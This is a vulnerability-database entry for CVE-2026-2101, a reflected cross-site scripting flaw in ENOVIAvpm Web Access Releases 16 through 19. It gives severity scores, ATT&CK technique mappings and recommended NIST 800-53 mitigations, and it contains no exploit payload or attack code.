Cyber Posture

CVE-2026-2101

High

Published: 16 February 2026

Published
16 February 2026
Modified
15 April 2026
KEV Added
Patch
CVSS Score 8.7 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
EPSS Score 0.0004 13.4th percentile
Risk Priority 17 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-2101 is a high-severity Cross-site Scripting (CWE-79) vulnerability in 3Ds (inferred from references). Its CVSS base score is 8.7 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 13.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190) and 1 other technique. What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-15 Information Output Filtering good match
prevent

Filters malicious scripts from web application outputs before delivery to the browser, directly preventing reflected XSS execution in user sessions.

SI-10 Information Input Validation good match
prevent

Validates and sanitizes untrusted inputs to block injection of arbitrary scripts that could be reflected back to victims.

SI-2 Flaw Remediation good match
prevent

Remediates the specific reflected XSS flaw in ENOVIAvpm Web Access versions 1 R16-R19 by applying vendor-provided patches.

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
attack.mitre.org →
T1059.007 JavaScript Execution
Adversaries may abuse various implementations of JavaScript for execution.
attack.mitre.org →
Why these techniques?

Reflected XSS in public-facing web app directly enables exploitation of the application (T1190) and arbitrary JavaScript execution in the victim browser (T1059.007).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

A Reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIAvpm Web Access from ENOVIAvpm Version 1 Release 16 through ENOVIAvpm Version 1 Release 19 allows an attacker to execute arbitrary script code in user's browser session.

Deeper analysisAI

CVE-2026-2101 is a Reflected Cross-site Scripting (XSS) vulnerability, mapped to CWE-79, affecting ENOVIAvpm Web Access in ENOVIAvpm Version 1 Release 16 through Version 1 Release 19. Published on 2026-02-16, it carries a CVSS v3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N). The issue enables an attacker to execute arbitrary script code within a user's browser session.

Exploitation requires an attacker with low privileges (PR:L) to deliver a malicious payload over the network (AV:N) with low attack complexity (AC:L), typically by tricking a targeted user into some interaction (UI:R), such as clicking a crafted link. Upon success, the attacker achieves script execution in the victim's browser context, resulting in high confidentiality and integrity impacts (C:H/I:H) with no availability impact (A:N) and a changed scope (S:C) that could affect other users or resources.

Mitigation details are available in the vendor security advisory at https://www.3ds.com/trust-center/security/security-advisories/cve-2026-2101.

Details

CWE(s)
CWE-79

Affected Products

3Ds
inferred from references and description; NVD did not file a CPE for this CVE

CVEs Like This One

CVE-2024-26006Shared CWE-79
CVE-2025-7760Shared CWE-79
CVE-2026-24948Shared CWE-79
CVE-2025-22709Shared CWE-79
CVE-2026-27614Shared CWE-79
CVE-2025-23689Shared CWE-79
CVE-2025-23760Shared CWE-79
CVE-2025-28935Shared CWE-79
CVE-2025-25087Shared CWE-79
CVE-2026-5112Shared CWE-79

References